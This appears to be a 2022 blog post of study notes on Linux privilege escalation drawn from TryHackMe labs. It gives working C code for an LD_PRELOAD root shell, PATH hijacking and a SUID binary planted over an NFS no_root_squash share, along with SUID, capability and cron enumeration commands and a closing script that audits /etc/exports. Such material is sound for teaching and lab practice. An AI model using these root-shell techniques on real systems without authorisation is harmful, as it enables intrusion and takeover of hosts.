  • aldern00b

Uncovering Privilege Escalation Opportunities: How to Spot Misconfigurations on Linux Systems

SUDO

First, always start with sudo -l, which lists the commands your user is allowed to run with sudo. Also note whether sudo is configured to preserve the LD_PRELOAD environment variable. If it is, you can create a C file like the one below.

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>   /* for setgid()/setuid() */

/* runs when the library is loaded via LD_PRELOAD (built with -nostartfiles) */
void _init() {
    unsetenv("LD_PRELOAD");   /* so the spawned shell does not reload this library */
    setgid(0);
    setuid(0);
    system("/bin/bash");
}

Compile it like this:

gcc -fPIC -shared -o shell.so shell.c -nostartfiles

We can now use this file when launching any program our user can run with sudo. We need to run the program by specifying the LD_PRELOAD option:

sudo LD_PRELOAD=/home/user/ldpreload/shell.so find

Next, look up each binary you are allowed to run on GTFOBins (for example https://gtfobins.github.io/gtfobins/nmap/) to find a way to elevate.


Look for ways to leverage application functions. Some applications load modules or configuration files that you can create yourself. For example, Apache has a -f option that lets you supply an additional configuration file.


SUID

SUID (set-user-ID) and SGID (set-group-ID) cause a file to be executed with the privileges of its owner or of its group, respectively.

find / -type f \( -perm -4000 -o -perm -2000 \) -ls 2>/dev/null   # -4000 = SUID, -2000 = SGID

will list files that have the SUID or SGID bit set. Once again, we'll visit GTFOBins and use the SUID filter to check each binary on the list we get back.


CAPABILITIES

Capabilities help manage privileges on a binary at a more granular level. We can use the "getcap" tool to list enabled capabilities. Be sure to run this command with the /dev/null redirect on so you're not drowning in error messages.

getcap -r / 2>/dev/null

Here's an example from one of the THM study rooms:

GTFOBins shows how the capability set on that binary can be used to drop into a root shell.


CRON JOBS

Cron jobs are used to run scripts or binaries at specific times. Each user on the system has their own crontab, and system-wide jobs are kept in /etc/crontab. You can see those system-wide tasks with:

cat /etc/crontab

ENVIRONMENT VARIABLES

Which folders are on $PATH?

echo $PATH

Does your current user have write privileges for any of these folders?

find / -writable 2>/dev/null | cut -d "/" -f 2 | sort -u
find / -writable 2>/dev/null | grep usr | cut -d "/" -f 2,3 | sort -u   # same check, one level deeper under /usr

Can you modify $PATH?

export PATH=/tmp:$PATH

Is there a script or application you can start that calls a command by bare name and is therefore affected by this PATH change? You can create your own binary with a program like this (taken from the THM Linux Priv Esc course), saved as path_exp.c:

#include <unistd.h>
#include <stdlib.h>   /* for system() */

int main()
{
  setuid(0);
  setgid(0);
  system("alder");   /* bare name, so it is resolved through $PATH */
  return 0;
}

We then compile it like this:

gcc path_exp.c -o alder -w
chmod u+s alder

NFS

NFS (Network File System) export configuration is kept in the /etc/exports file. This file is created during the NFS server installation and is usually readable by all users. Writable exports that also set no_root_squash, like the last three lines below, are what you're looking for:


$ cat /etc/exports
# /etc/exports: the access control list for filesystems which may be exported
#               to NFS clients.  See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes       hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4        gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes  gss/krb5i(rw,sync,no_subtree_check)
#
/home/backup *(rw,sync,insecure,no_root_squash,no_subtree_check)
/tmp *(rw,sync,insecure,no_root_squash,no_subtree_check)
/home/ubuntu/sharedfolder *(rw,sync,insecure,no_root_squash,no_subtree_check)

If you see this, check for shares:

showmount -e 10.10.109.187

Then mount the share on our attack box:


$ mkdir /tmp/stealyourstuff
$ sudo mount -o rw 10.10.109.187:/home/backup /tmp/stealyourstuff

Just like under "Environment Variables" above, we're going to compile our own binary and set the SUID bit on it, inside the folder we just mounted.

sudo nano nfs.c

The binary:

#include <unistd.h>
#include <stdlib.h>

int main()
{
  setgid(0);
  setuid(0);
  system("/bin/bash");
  return 0;
}

Compile it, set the SUID bit, then go back to the client box:

sudo gcc nfs.c -o nfs -w 
sudo chmod +s nfs
ls -la nfs

Run the binary from the client box and it should drop you into a root shell. NOTE: the gcc used to build it MUST produce a binary compatible with the client machine.
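As an added example (not code from the original post), here is a small audit script that flags the exports pattern shown above: any export that is both rw and no_root_squash, which is the combination that lets a root user on a client write a root-owned SUID file onto the share. It assumes the exports(5) line format and, when run without a file argument, uses a constructed sample shaped like the listing above.

```shell
#!/bin/sh
# Added audit helper, not part of the original post. NFS defaults are ro and
# root_squash, so an export is only reported when both "rw" and "no_root_squash"
# are explicitly set. audit_exports FILE: prints one RISK line per such export
# and exits 1 if any were found, 0 otherwise.
audit_exports() {
    awk '
        /^[ \t]*#/ || /^[ \t]*$/ { next }                # skip comments and blanks
        {
            path = $1
            for (i = 2; i <= NF; i++) {
                client = $i; opts = ""
                if (match(client, /\(.*\)$/)) {          # split "host(opt,opt)"
                    opts   = substr(client, RSTART + 1, RLENGTH - 2)
                    client = substr(client, 1, RSTART - 1)
                }
                # "host (rw)" with a space leaves a bare "(rw)" field; exports(5)
                # applies those options to every host, so report it as "*".
                if (client == "") client = "*"
                rw = 0; nrs = 0; n = split(opts, o, ",")
                for (j = 1; j <= n; j++) {
                    if (o[j] == "rw") rw = 1
                    if (o[j] == "no_root_squash") nrs = 1
                }
                if (rw && nrs) {
                    risky++
                    printf "RISK %s is exported rw with no_root_squash to %s (%s)\n", path, client, opts
                }
            }
        }
        END { if (risky > 0) exit 1 }
    ' "$1"
}
# Constructed sample, shaped like the /etc/exports listing in the post (the last
# line shows the "host (opts)" spacing mistake); used when no file is given.
write_sample() {
    cat > "$1" <<'EOF'
# /etc/exports: comments and blank lines are ignored
/srv/homes       hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
/home/backup *(rw,sync,insecure,no_root_squash,no_subtree_check)
/tmp *(rw,sync,insecure,no_root_squash,no_subtree_check)
/srv/data 10.0.0.5 (rw,no_root_squash)
EOF
}
if [ $# -gt 0 ]; then
    audit_exports "$1"
else
    sample=$(mktemp); write_sample "$sample"
    audit_exports "$sample" || echo "risky exports found (exit status $?)"; rm -f "$sample"
fi
```

Run it against a real file with `sh audit_exports.sh /etc/exports`; a non-zero exit status means at least one export needs fixing (drop rw, remove no_root_squash, or restrict the client list).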

©2022 by AlderN00b. Proudly created with Wix.com